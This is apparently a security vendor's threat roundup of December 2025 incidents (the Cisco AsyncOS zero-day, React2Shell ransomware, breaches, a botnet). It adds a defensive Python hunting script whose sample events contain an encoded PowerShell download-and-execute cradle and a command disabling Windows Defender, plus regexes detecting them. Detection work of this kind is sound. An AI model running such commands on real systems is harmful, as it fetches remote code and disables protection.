Content 

01. News Bites
  • Suspect arrested after French interior ministry cyber attack
  • Cisco warns of actively exploited AsyncOS zero-day
  • Ransomware gang exploits React2Shell flaw within seconds
  • SoundCloud confirms major data breach affecting 28 million users
  • Kimwolf botnet harnesses 1.8 million Android devices
02. Conclusion

Quick News Bites

Suspect arrested after French interior ministry cyber attack

French authorities have arrested a 22-year-old man in connection with a cyber attack on the French Interior Ministry, following an investigation led by the Paris prosecutor’s cybercrime unit. The arrest took place on 17 December 2025 and relates to unauthorised access to the ministry’s internal email systems and document servers.

According to the Ministry of the Interior, the suspect, born in 2003, is already known to the justice system and was convicted earlier in 2025 for similar cyber-related offences. He is being investigated for unauthorised access to a state-run automated data processing system, an offence that carries a potential sentence of up to 10 years in prison.

The breach was detected overnight between 11 and 12 December and resulted in unauthorised access to internal files, including criminal records. Interior Minister Laurent Nuñez described the incident as serious, noting that while large-scale data extraction has not been confirmed, the full extent of the compromise remains unclear.

France’s Office for Combating Cybercrime is leading the investigation, with further updates expected once police custody concludes.

Cisco warns of actively exploited AsyncOS zero-day

Cisco has warned customers about a maximum-severity zero-day vulnerability in Cisco AsyncOS that is being actively exploited in the wild. The flaw, tracked as CVE-2025-20393, affects Secure Email Gateway (SEG) and Secure Email and Web Manager (SEWM) appliances only in a non-default configuration: one where the Spam Quarantine feature is enabled and exposed to the internet. Appliances that do not expose Spam Quarantine are not affected. At the time of writing, no patch is available.

Cisco Talos attributes the attacks with moderate confidence to a Chinese-linked threat actor tracked as UAT-9686. The group is abusing the flaw to execute arbitrary commands with root privileges, deploy persistent AquaShell backdoors, establish reverse SSH tunnels using AquaTunnel and Chisel, and remove forensic evidence with a log-clearing tool named AquaPurge. The campaign has been active since at least late November 2025.

Cisco is urging administrators to remove Spam Quarantine from internet exposure, tighten access controls, monitor appliance logs closely, and contact the Cisco Technical Assistance Center (TAC) to assess potential compromise. Because the attackers establish persistence on the appliance itself, rebuilding affected devices may be required to fully remove it.

Ransomware gang exploits React2Shell flaw within seconds

A ransomware group has been observed exploiting the critical React2Shell vulnerability (CVE-2025-55182) to gain initial access to corporate networks and deploy file-encrypting malware in under a minute. React2Shell is an insecure deserialisation flaw in the React Server Components Flight protocol, used by React and Next.js, which allows unauthenticated remote code execution on vulnerable servers.

Researchers at S-RM confirmed that the flaw was used on 5 December to deliver the Weaxor ransomware strain. Shortly after exploitation, attackers launched an obfuscated PowerShell command to deploy a Cobalt Strike beacon, disabled Windows Defender real-time protection, and executed the ransomware payload. The entire sequence occurred in less than 60 seconds.

Weaxor, believed to be a rebrand of the Mallox operation, focuses on opportunistic attacks against public-facing systems and demands relatively low ransoms. S-RM warns that patching alone is insufficient, since servers exposed before the fix may already have been compromised, and urges organisations to review web server logs and EDR telemetry for signs of exploitation and post-exploitation activity.
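The chain above (web application process spawning PowerShell, an encoded command that stages a payload, Windows Defender real-time protection switched off, all on one host inside a minute) is exactly the kind of pattern that is visible in process-creation telemetry even after the server has been patched. The following hunting script is an added example written for this roundup; it is not S-RM's, Cisco's or any vendor's detection content. It assumes Sysmon Event ID 1 field names (ParentImage, Image, CommandLine, Computer, UtcTime), assumes the Next.js application is served by node.exe, and runs over constructed sample events, including a documentation-range IP address, that are not taken from any real incident.

```python
"""Hunt process-creation telemetry for the React2Shell post-exploitation chain.

Added example (not vendor detection content). Field names follow Sysmon
Event ID 1; map your EDR's export onto them. All sample data is constructed.
"""
import base64
import json
import re
from collections import defaultdict
from datetime import datetime

# Assumption: the Next.js app is served by node.exe. Add w3wp.exe or your
# reverse proxy binary if that is what actually fronts the application.
WEB_SERVER_IMAGES = {"node.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Indicators checked against the raw command line plus its decoded payload.
PS_INDICATORS = {
    "defender_tamper": re.compile(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(?:\$true|1)", re.I),
    "download_cradle": re.compile(
        r"(?:IEX|Invoke-Expression)\b.*(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: dict) -> list:
    """Tag one process-creation event with the indicators it matches."""
    tags = []
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
        tags.append("web_server_spawned_shell")  # RCE from the web tier
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded is not None:
        tags.append("encoded_powershell")
    text = ev["CommandLine"] + "\n" + (decoded or "")
    for name, rx in PS_INDICATORS.items():
        if rx.search(text):
            tags.append(name)
    return tags


def hunt(events, window_seconds: int = 60) -> list:
    """Group tagged events per host and rate each host.

    'critical' means initial access from the web server and Defender tampering
    happened on the same host inside the window; anything else tagged is 'review'.
    """
    by_host = defaultdict(list)
    for ev in events:
        tags = score_event(ev)
        if tags:
            ts = datetime.fromisoformat(ev["UtcTime"].replace("Z", "+00:00"))
            by_host[ev["Computer"]].append((ts, tags))
    findings = []
    for host, hits in sorted(by_host.items()):
        hits.sort(key=lambda h: h[0])
        tags = sorted({t for _, ts in hits for t in ts})
        elapsed = (hits[-1][0] - hits[0][0]).total_seconds()
        fast_chain = {"web_server_spawned_shell", "defender_tamper"} <= set(tags)
        severity = "critical" if fast_chain and elapsed <= window_seconds else "review"
        findings.append({"host": host, "severity": severity, "tags": tags,
                         "elapsed_seconds": elapsed, "events": len(hits)})
    return findings


def _encoded(cmd: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects (sample data only)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry: WEB01 shows the chain, WEB02 shows benign noise.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-12-05T10:00:01Z", "Computer": "WEB01",
     "ParentImage": r"C:\Program Files\nodejs\node.exe", "Image": PS_PATH,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _encoded(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"UtcTime": "2025-12-05T10:00:12Z", "Computer": "WEB01",
     "ParentImage": PS_PATH, "Image": PS_PATH,
     "CommandLine": "powershell.exe -e " + _encoded(
         "Set-MpPreference -DisableRealtimeMonitoring $true")},
    {"UtcTime": "2025-12-05T10:00:30Z", "Computer": "WEB01",
     "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_PATH,
     "CommandLine": "powershell.exe -NoExit -Command Get-ChildItem"},
    {"UtcTime": "2025-12-05T10:05:00Z", "Computer": "WEB02",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS_PATH,
     "CommandLine": r"powershell.exe -w hidden -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    print(json.dumps(hunt(SAMPLE_EVENTS), indent=2))
```

Run it as-is to see WEB01 rated critical with an 11-second chain and WEB02 rated review for a hidden-window script only. Decoding the -EncodedCommand payload is the important step: the Defender tampering and download cradle are invisible in the raw command line, which is precisely why the attackers encode them.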

SoundCloud confirms major data breach affecting 28 million users

SoundCloud has confirmed a cyberattack that exposed data from around 28 million user accounts, roughly 20% of its global user base. The breach was detected after unauthorised activity was identified within an internal service dashboard. While no passwords or financial information were compromised, attackers accessed user email addresses combined with publicly visible profile data, raising concerns over targeted phishing campaigns.

The attack has been linked to ShinyHunters, a well-known data extortion group previously associated with other high-profile breaches. SoundCloud said the intrusion affected a secondary internal system rather than its core platform, which meant the attackers never had to get past the stronger controls that protect the main service.

In response, SoundCloud implemented emergency security measures, which triggered temporary service disruptions and VPN access issues in several countries. The company has since strengthened monitoring and access controls and urged users to change passwords and enable two-factor authentication.

The incident highlights the growing focus on large-scale data theft as a precursor to social engineering attacks.

Kimwolf botnet harnesses 1.8 million Android devices

Researchers at QiAnXin XLab have uncovered a massive new DDoS botnet dubbed Kimwolf, which has compromised an estimated 1.8 million Android-based TVs, set-top boxes, and tablets worldwide. Active since at least October 2025, the botnet is capable of launching large-scale DDoS attacks alongside proxy forwarding, reverse shell access, and file management.

Between 19 and 22 November, Kimwolf issued an estimated 1.7 billion attack commands, briefly propelling one of its command-and-control domains to the top of Cloudflare’s most queried domains list. Infections are concentrated in countries including Brazil, India, the US, South Africa, and the Philippines, with smart TV boxes identified as the primary targets.

XLab believes Kimwolf is linked to the notorious AISURU botnet, with shared infrastructure and code suggesting both belong to the same threat group. Recent variants have adopted Ethereum Name Service-based techniques to evade takedowns, highlighting the growing resilience and scale of modern IoT-focused botnets.

Closing Summary

If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively get in touch to find out how you can protect your organisation.

Disclaimer

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.